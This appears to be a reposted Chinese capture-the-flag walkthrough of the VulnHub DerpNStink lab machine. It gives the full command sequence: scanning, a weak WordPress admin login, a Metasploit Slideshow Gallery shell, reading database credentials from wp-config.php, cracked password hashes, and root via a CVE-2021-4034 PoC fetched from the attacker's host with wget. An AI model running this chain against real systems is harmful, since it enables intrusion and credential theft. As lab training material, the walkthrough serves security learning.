【vulnhub】DerpNStink靶机
靶机安装下载所在:DerpNStink: 1 ~ VulnHub
信息网络
靶机IP扫描
nmap 192.168.93.0/24
https://img-blog.csdnimg.cn/img_convert/7c93426ba3359ffa5ca44a54767d44eb.png
端口扫描,开放21、22、80端口
nmap -A192.168.93.158 -p-
https://img-blog.csdnimg.cn/img_convert/1ef167c6bb4c64eac5da0dca8f7a6842.png
目录扫描
dirsearch -u http://192.168.93.158
https://img-blog.csdnimg.cn/img_convert/450487a5b3630f5b2628b0dcb5dd49f4.png
进行网址访问,页面上只有个单词DeRPnStiNK,先记下来
https://img-blog.csdnimg.cn/img_convert/49815b3a02b4e024f2e392d268aa1d54.png
点击检查,发现第一个flag
https://img-blog.csdnimg.cn/img_convert/38830461f6c32d98933e1985cdee6de0.png
又发现存在一个文件/webnotes/info.txt进行访问
https://img-blog.csdnimg.cn/img_convert/9184ae69624a6ffedb3d1280a42b3307.png
https://img-blog.csdnimg.cn/img_convert/19798458d356952c9c4a0a5e6e34f71b.png
翻译一下
https://img-blog.csdnimg.cn/img_convert/6e5e5afb8fbdfcd812f6166e9aca1b8d.png
是需要更新当地DNS主机文件,思考应该是需要我们把IP和对应的域名进行添加到hosts文件中,但不知道域名是什么
后面拼接扫描出来的目录/php/phpmyadmin/看起来应该是一个可以登录到数据库里面的
https://img-blog.csdnimg.cn/img_convert/732c631cf2404179fb1de2772fa35660.png
拼接/robots.txt
https://img-blog.csdnimg.cn/img_convert/840fe133486ae7da5aa38d6d1cf7dd85.png
继承访问
https://img-blog.csdnimg.cn/img_convert/0f7a997ff9c535aacbaadbeea4f0e7eb.png
我们重新用另一下令进行目录扫描一下,会出现许多上面没有扫出来的目录,
dirbhttp://192.168.93.158
https://img-blog.csdnimg.cn/img_convert/b5548e83728f281f67826c07e7575dee.png
https://img-blog.csdnimg.cn/img_convert/d97e490440545d0ce904f6472b0432c3.png
weblog目录下存在登录页面,测试一下
https://img-blog.csdnimg.cn/img_convert/be00e0a2440d4f552ae0c55ab75d365e.png
发现进行了域名跳转到:https://derpnstink.local/weblog/,并且页面加载失败
因此大概前面的DNS更新应该是192.168.93.158与derpnstink.local/weblog/的对应关系添加
https://img-blog.csdnimg.cn/img_convert/78c10cce8c423c44e8e9492f6746f924.png
通过目录扫描出来的,还有目录//weblog/wp-admin/
https://img-blog.csdnimg.cn/img_convert/69e5cc1b7732d0c492e03c7b9014cefc.png
尝试弱口令登录,成功 admin/admin
https://img-blog.csdnimg.cn/img_convert/31bfd9ea591799d3403943bb06e24d08.png
毛病利用
这个框架是WordPress,进行工具使用 wpscan 扫描,扫描到许多插件存在毛病
wpscan --url http://derpnstink.local/weblog
https://img-blog.csdnimg.cn/img_convert/cff8b857cd4422339848759caf92e647.png
使用Slideshow Gallery 存在的毛病
因为我们知道后台的账户密码,以是我们用msf来进行getshell操作
开启msf情况
msfconsole
search slideshow
use 1
show option
set rhosts 192.168.93.158
set targeturi /weblog/ #设置目标的url目录地址
set wp_user admin
set wp_password admin
run
https://img-blog.csdnimg.cn/img_convert/ebb297689a438e993b4c252f6a675837.png
https://img-blog.csdnimg.cn/img_convert/568823db0a0e17fcd9f80d973e5a3336.png
先将获取到的shell变化为交互式的shell
shell
python -c 'import pty; pty.spawn("/bin/bash")' # 获得交互式命令行
https://img-blog.csdnimg.cn/img_convert/669ecf31a6c8172c58d9b4530692d71b.png
翻看配置文件,发现了目标数据库的账号和密码
cd /var/www/html/weblog
ls
cat wp-config.php
root:mysql
https://img-blog.csdnimg.cn/img_convert/03cef501f882d98334a4d71b770b925e.png
https://img-blog.csdnimg.cn/img_convert/b8d3b221904b44493bcf3dc106e13561.png
是数据库的账号和密码,回到页面进行登录,登录成功
https://img-blog.csdnimg.cn/img_convert/89110e7ba3e74288ee85d30f42424515.png
访问 wp_posts 表发现 flag2.txt
https://img-blog.csdnimg.cn/img_convert/8be39dfe3b3b86789a7bdb81aa78c083.png
在 wp_users 表发现两个账户密码
https://img-blog.csdnimg.cn/img_convert/b4588bff1e73ca8cac2140560927dee5.png
unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ 破解之后是wedgie57
https://img-blog.csdnimg.cn/img_convert/5f7bf2659a82e96366368a13f90234ab.png
在靶机home目录下发现两个用户,mrderp/stinky
https://img-blog.csdnimg.cn/img_convert/99068c1ddf290c78581bf97841f955ef.png
尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57
https://img-blog.csdnimg.cn/img_convert/0d536dcb42aa47d68319089f631eaadb.png
成功切换到stinky用户,进入到stinky目录并查看当前目录的全部文件
https://img-blog.csdnimg.cn/img_convert/0bdb1014f4e403e9a0ec2da0f09a8be3.png
在Desktop目录发现了flag3
https://img-blog.csdnimg.cn/img_convert/130ea06f41e918ebb7b3b3cd6f87ba02.png
提权
观察到ubuntu版本是14.04,大概存在一个毛病。
我刚开始用的是kali上面的searchsploit工具下令进行搜刮版本利用搜刮出来的脚本文件,但失败了,也大概是利用的脚本不对,各人可以多尝试几个脚本,看看能否成功,也希望与各人讨论
我在这找了一个有关版本的干系提权文件,有一个当地提权毛病CVE-2021-4034, 作用有点雷同于sudo,允许用户以另一个用户身份实行下令
#这个提权漏洞利用脚本下载地址
https://github.com/arthepsy/CVE-2021-4034
将这个文件下载下来,复制到kali里面,并挂到服务上面
在反弹的交互式shell中,必须要进入tmp目录,否则无法下载
从kali的web端wget下来cve-2021-4034-poc.c,将其gcc编译输出。然后复权运行,即可提权成功。
#下载命令
wget http://192.168.93.130:8000/cve-2021-4034-poc.c
#下载完成之后,权限修改
chmod +x cve-2021-4034-poc.c
#编译脚本
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt
https://img-blog.csdnimg.cn/img_convert/cec76863b8aae0345a630b4f02ed02cc.png
https://img-blog.csdnimg.cn/img_convert/408974731496989c0ede7f34f98d65d8.png
进行这个脚本运行,提权成功
https://img-blog.csdnimg.cn/img_convert/395c08810c23fa206c9ed1c22b1e4320.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]